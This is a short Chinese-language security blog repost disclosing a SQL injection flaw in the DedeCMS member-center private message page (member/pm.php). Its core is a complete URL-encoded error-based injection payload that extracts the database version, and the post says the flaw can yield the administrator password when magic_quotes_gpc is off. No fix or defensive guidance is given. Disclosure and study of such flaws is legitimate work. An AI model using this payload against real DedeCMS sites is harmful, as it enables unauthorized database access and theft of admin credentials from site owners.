DedeCMS会员中心短消息SQL注射0day漏洞

暗月博客

810
文章

0
评论

2019年11月21日15:50:57评论308 views字数 407阅读1分21秒阅读模式

摘要

作者:c4rp3nt3r
主页:http://www.0x50sec.org需要:magic_quotes_gpc = OffDedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等

作者:c4rp3nt3r
主页:http://www.0x50sec.org

需要:magic_quotes_gpc = Off

DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等

看到微博上有人提了下,偶也发鸡肋了.

http://bt/de/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由暗月博客发表于 2019年11月21日15:50:57
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
DedeCMS会员中心短消息SQL注射0day漏洞http://cn-sec.com/archives/70809.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

DedeCMS会员中心短消息SQL注射0day漏洞

PHP 函数漏洞总结

xise菜刀的密文解密工具

逆向工程学习第一天--一个VC6编译的小程序

从后台弱口令到内网漫游

Burp Suite Professional 2.1.05 最新版本下载

Hacking Oracle PART 1

分享一款失败的国产加密勒索软件

NSO到底是个什么样的公司？揭秘三叉戟0day的缔造者

GitHub上10个最受欢迎的安全项目

齐博CMS splitword.php后门解密

发表评论

在线咨询

微信